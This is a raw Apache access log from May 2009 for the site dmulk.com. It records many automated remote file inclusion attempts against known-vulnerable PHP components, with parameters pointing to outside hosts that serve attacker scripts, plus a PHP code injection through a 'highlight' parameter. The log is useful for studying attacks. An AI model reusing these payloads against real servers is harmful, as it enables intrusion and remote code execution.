69.172.92.14 - - [22/May/2009:09:48:16 -0700] "GET /logs/access_081122.log//inc/header.php/step_one.php?server_inc=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:48:17 -0700] "GET /inc/header.php/step_one.php?server_inc=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:48:18 -0700] "GET /logs/access_090321.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:48:22 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:48:23 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:48:27 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:48:34 -0700] "GET /logs/access_080511.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:46 -0700] "GET /logs/access_080321.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:46 -0700] "GET /logs/access_080321.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:46 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:46 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:46 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:46 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:46 -0700] "GET /logs/access_080615.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:46 -0700] "GET /logs/access_080615.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:48:52 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:48:52 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:48:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:53 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:53 -0700] "GET /logs/access_080321.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:53 -0700] "GET /logs/access_080615.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:53 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:53 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:53 -0700] "GET /logs/access_080615.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:53 -0700] "GET /logs/access_080321.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:48:56 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:49:00 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:09:49:14 -0700] "GET /logs/access_080621.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:09:49:16 -0700] "GET /logs/access_090119.log%20%20/str.php?lang=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:09:49:26 -0700] "GET /logs/access_080313.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:49:43 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.45.190.166 - - [22/May/2009:09:49:47 -0700] "GET /logs/access_080126.log%20%20//skin/zero_vote/login.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:09:49:47 -0700] "GET /logs/access_080419.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:49:47 -0700] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:49:48 -0700] "GET /logs/access_080601.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.45.190.166 - - [22/May/2009:09:49:49 -0700] "GET /logs/access_090212.log%20%20//skin/zero_vote/login.php?dir=http://www.templarske-sklepy.cz/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:09:49:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
222.239.76.25 - - [22/May/2009:09:49:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
121.173.130.41 - - [22/May/2009:09:49:52 -0700] "GET /logs/access_080611.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.173.130.41 - - [22/May/2009:09:49:52 -0700] "GET /logs/access_080419.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:09:49:53 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "dmulk.com"
76.220.28.235 - - [22/May/2009:09:49:55 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:50:02 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:50:02 -0700] "GET /logs/access_080615.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:50:02 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:50:03 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:50:03 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:50:03 -0700] "GET /logs/access_080615.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.94.155.59 - - [22/May/2009:09:50:04 -0700] "GET /logs/access_080515.log%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:50:04 -0700] "GET /logs/access_080321.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:50:07 -0700] "GET /logs/access_081128.log%20%20/principal.php?conteudo=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:50:07 -0700] "GET /logs/access_081007.log%20%20/principal.php?conteudo=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:50:09 -0700] "GET /logs/access_080321.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:50:10 -0700] "GET /logs/principal.php?conteudo=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:50:11 -0700] "GET /principal.php?conteudo=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:50:11 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:50:44 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:50:45 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:50:49 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.64.202.135 - - [22/May/2009:09:51:03 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:51:04 -0700] "GET /logs/access_090126.log//guestbook1//admin.php?include_path=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:51:06 -0700] "GET /logs/access_081122.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.64.202.135 - - [22/May/2009:09:51:10 -0700] "GET /logs/access_080514.log//squirrelcart/cart_content.php?cart_isp_root=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:51:19 -0700] "GET /logs/access_080827.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:51:34 -0700] "GET /logs/access_090319.log//inc/header.php/step_one.php?server_inc=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:51:43 -0700] "GET /logs/access_081122.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:51:48 -0700] "GET /logs/access_081007.log/principal.php?conteudo=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:09:51:48 -0700] "GET /logs/access_081128.log/principal.php?conteudo=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:51:50 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:51:50 -0700] "GET /logs/access_081122.log//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:51:51 -0700] "GET /login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:51:51 -0700] "GET /logs//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:51:52 -0700] "GET /logs/access_090321.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:52:04 -0700] "GET /logs/access_080326.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:52:05 -0700] "GET /logs/access_081122.log//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:52:05 -0700] "GET /login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:52:06 -0700] "GET /logs//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:52:07 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:52:08 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:52:30 -0700] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:52:31 -0700] "GET /logs/access_080601.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:52:48 -0700] "GET /logs/access_081001.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:52:58 -0700] "GET /logs/access_071229.log//login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.76.25 - - [22/May/2009:09:53:01 -0700] "GET /logs/access_080313.log//skin/zero_vote/error.php?dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:53:05 -0700] "GET /logs/access_080411.log/scanhttp://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:53:06 -0700] "GET /scanhttp://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:53:07 -0700] "GET /logs/scanhttp://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [22/May/2009:09:53:09 -0700] "GET /login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:53:32 -0700] "GET /logs/access_081122.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:53:38 -0700] "GET /login.php?dir=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.172.92.14 - - [22/May/2009:09:54:07 -0700] "GET /logs/access_080501.log/scanhttp://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.13.227.99 - - [22/May/2009:09:54:10 -0700] "GET /logs/access_090321.log//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.244.131.166 - - [22/May/2009:09:54:30 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "http://hk.search.yahoo.com/search/combo?p=uniquantum&fr=FP-tab-web-t-ac&fr2=tab-web&ei=UTF-8&myip=124.244.131.166&tmpl=&meta=rst%3Dhk" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
124.244.131.166 - - [22/May/2009:09:54:31 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:45 -0700] "GET /logs/access_080615.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:45 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:45 -0700] "GET /logs/access_080321.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:46 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:46 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:46 -0700] "GET /logs/access_080321.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:48 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:49 -0700] "GET /logs/access_080615.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:51 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:51 -0700] "GET /logs/access_080615.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:51 -0700] "GET /logs/access_080321.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:54 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:54 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:55 -0700] "GET /logs/access_080615.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:09:54:55 -0700] "GET /logs/access_080321.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:54:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
